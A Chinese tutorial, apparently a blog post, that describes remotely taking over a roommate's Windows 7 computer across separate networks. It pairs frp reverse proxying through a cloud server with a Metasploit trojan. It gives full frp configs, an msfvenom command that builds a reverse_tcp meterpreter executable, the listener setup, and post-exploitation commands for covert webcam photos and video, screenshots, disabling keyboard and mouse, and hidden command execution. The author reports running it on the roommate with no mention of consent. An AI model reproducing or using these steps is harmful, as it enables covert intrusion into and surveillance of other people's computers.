frp反向代理+内网穿透+ Metasploit渗透windows
实验环境:
阿里云ECS一台:x.x.x.x
内网kali控制端:192.168.2.104
外网win7主机:
前言
我在家,我室友在学校,在两个完全不同的局域网,我想穿过公网实现远控他的电脑,我上篇文章写过局域网下kali控制win7,想想,黑客都和肉鸡在一个局域网了,要是遇见高手了还怕抓不住你?,自己琢磨了很久,想到我前面刚好做过frp内网穿透,由于frp是一个高效反向代理和内网穿透的软件,刚好配合kali的metsploit 做真正的远控,想想就觉得牛逼,哈哈,只是自己的猜想,网上找资料没找到,所以自己动手了。
场景描述
操作步骤:
由于上篇文章写过搭建frp,所以这里不详细写,很简单的,直接给配置文件,不会frp请看:https://blog.csdn.net/qq_38228830/article/details/85722385
1、阿里云主机上启动frps
配置文件如下:
vim frps.ini
frp服务端与客户端连接端口,frps和frpc必须一致
bind_port = 7000
下面配置可以不写,个人意愿
仪表盘端口,只有设置了才能使用仪表盘(即后台)
dashboard_port = 7500
仪表盘访问的用户名密码,如果不设置,则默认都是 admin
dashboard_user = admin
dashboard_pwd = admin
启动frps:./frps. -c ./frps.ini
2、 kali启动frpc:
配置文件如下:
vim frpc.ini
[common]
server_addr = 你的云主机ip
server_port = 7000 #frpc工作端口,必须和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的5555
remote_port = 6000 #服务端用6000端口转发给本机
启动frpc: ./frpc -c ./frpc.ini
这时服务端有显示了:
到此frp反向代理+内网穿透做完,下面开始木马程序制作与监听控制。
3、msfvenom制作Windows木马程序:关键步骤
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公网ip lport=6000 -f exe x>Xaly.exe
lhost:必需设置为你的公网ip
lport:设置你在frpc.ini的remote_port = 6000
只有通过服务器的6000端口数据包才能成功转发到我们的kali上来,这也是为什么要用frp反向代理原因。
制作好后将xaly.exe发送到目标Windows上
4、开始监听:关键步骤
在kali中
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 127.0.0.1 #设置监听ip,必须和frpc中的local_ip 一致
lhost => 127.0.0.1
msf exploit(multi/handler) > set lport 5555 #设置监听端口,与frpc中的local_port一致
lport =>5555
msf exploit(multi/handler) > exploit
开始测试
Windows端运行木马,
先观察我们阿里云的frp服务端情况
再观察kali监控情况:
表示获得了win7的控制权了,下面测试命令
webcan_snap 利用摄像头拍照
我室友照片
截取他的win7桌面
screenshot
其他命令:
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
webcam摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
